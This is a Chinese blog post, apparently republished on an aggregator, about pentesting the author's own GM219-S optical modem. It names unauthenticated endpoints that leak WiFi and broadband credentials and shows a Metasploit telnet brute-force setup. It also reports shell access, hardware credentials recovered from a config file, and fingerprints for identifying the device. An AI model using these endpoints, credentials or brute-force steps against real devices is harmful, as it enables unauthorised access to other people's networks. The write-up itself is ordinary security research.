记一次移动光猫（GM219-S）安全测试-编程知识

记一次移动光猫（GM219-S）安全测试

news/2025/1/20 16:02:39/文章来源:https://www.cnblogs.com/cn-sec-/p/18681622

前言

过个年，WiFi密码忘记了…光猫管理密码也忘记了（这个光猫也不支持物理按钮重置设置），但是手机还连着WiFi，正规操作找回不了密码，那就用咱们测试的思维来试试PWN掉这个路由器。

过程

未授权获取WiFi连接密码

还好之前没闲着，发现管理的几个未授权访问的接口如下:

获取宽带账号密码: /GET_USER_WAN_PPP_INFO.json

获取 WLAN 连接信息: /GET_WLAN_LINK_INFO.json

获取 DHCP 信息: /GET_NET_DHCP_INFO.json

手机访问 http://192.168.1.1/GET_WLAN_LINK_INFO.json ，获取密码：xxx，电脑连接登录

信息收集

端口收集结果

Scanning promote.cache-dns.local (192.168.1.1) [1080 ports]
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 8080/tcp on 192.168.1.1

目录扫描结果

获得的一些目录：

/login.html
/login.asp
/index.asp
/telnet.asp
/upgrade.asp
...

突破口

在目录扫描的时候，发现/telnet.asp -> 跳转到 /cgi-bin/telnet.asp 如下图所示界面：

这个功能可以开启光猫的telnet服务，先开启，然后再使用Nmap扫描下端口：

Scanning promote.cache-dns.local (192.168.1.1) [1080 ports]
Discovered open port 8080/tcp on 192.168.1.1
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 8023/tcp on 192.168.1.1

发现多了个8023端口，其对应的服务果然是telnet：

8023/tcp open  telnet
| fingerprint-strings:
|   GenericLines:
|     Star-Net Broadband Router
|     Login:
|     Password:
|   GetRequest:
|     Star-Net Broadband Router
|     Login: GET / HTTP/1.0
|     Password:
|   Help:
|     HELP
|     Star-Net Broadband Router
|     Login: Password:
|   NCP:
|     Star-Net Broadband Router
|     Login: DmdT^@^@^@
|     ^@^@^@^A^@^@^@^@^@
|   NULL:
|     Star-Net Broadband Router
|     Login:
|   RPCCheck:
|     Star-Net Broadband Router
|     Login:
|     ^@^@(r
|   SIPOptions:
|     Star-Net Broadband Router
|     Login: OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|     Accept: application/sdp
|     Password:
|   tn3270:
|     ^@IBM-3279-4-E
|     ^YStar-Net Broadband Router
|_    Login:

telnet开启，爆破一波走起。（Caimima生成个密码口令）

试了nmap貌似没啥用，开个msfconsole来爆破：

use auxiliary/scanner/telnet/telnet_login
set RHOSTS 192.168.1.1 #设置模板
set RPORT 8023 #设置端口
set USER_FILE /root/user.txt #设置用户字典
set PASS_FILE /root/pass.txt #设置密码字典
exploit 192.168.1.1 #启动

幸运的是爆破出来了，是组合弱口令：

获取密码

运行telnet 192.168.1.1 8023输入账号密码进去，执行sh发现可以直接进入shell：

接下来就是找密码到处瞎翻（没有PWN路由器的经验，很难受），执行 ls -a -l 发现有软链接，很多指向了/tmp目录：

于是进入/tmp目录，到处翻腾：

利用这几个关键词看看是否有文件中包含了：admin、CMCC(中国移动)、password、user

e.g. grep 'admin' ./*，等了老半天了，发现/tmp/ctromfile.cfg文件内有点东西：

复制密码登录，怼进去：

信息整合

做完测试并针对测试过程的信息进行整合，最后形成字典以便后面再次遇到～

通过读配置文件获取的一系列用户名、密码：9vvrr、admin、aDm8H%MdA、CMCCAdmin、telnetuser、user
文件、目录路径：
- /GET_USER_WAN_PPP_INFO.json
- /GET_WLAN_LINK_INFO.json
- /GET_NET_DHCP_INFO.json
- /telnet.asp
- /index.asp
- /user.html
- /upgrade.asp
- /cgi-bin/
- /content.asp
指纹特征：
- 标题：HGU LOGIN
- 图片：/webstyle/images/login-mobile-qrcode-anhui.png -> 23cb4f5e63e0cd47f8788a6ca3558eab
- JS：/webstyle/js/br_login_nc.js

结尾

最后我只是默默的把user用户密码改了一下～

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/872205.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

Web安全测试学习手册-业务逻辑测试

首先感谢朋友倾璇的邀请，参与了的相关撰写，目前负责业务逻辑测试这一块的撰写，目前初步已经成型，先发出来让大家看看，欢迎点评，也可以加入我们一起来撰写~ 业务逻辑测试介绍：这里对Web应用业务逻辑方面的安全缺陷进行介绍和常见案例讲解。任意用户密码重置常见的缺陷…

串口、COM口、UART口；TTL、 RS-232、 RS-485

串口、COM口、UART口TTL、RS-232、RS-485区别首先串口、COM口、UART口一般指的是硬件接口。而TTL、RS-232、RS-485则是逻辑电平0和1的不同表示标准它们区别如下：1）和RS232相比，由于RS485采用了差分传输的方式，因此抗干扰能力强很多。TTL抗干扰能力最差。2）像STM32这类单…

参考文档：https://www.cnblogs.com/mq0036/p/18302572using MLNET_Image; using static MLNET_Image.MLModel1;namespace MLNET.Image {public partial class MainForm : Form{public MainForm(){InitializeComponent();}private void btnSelectImage_Click(object sender, Ev…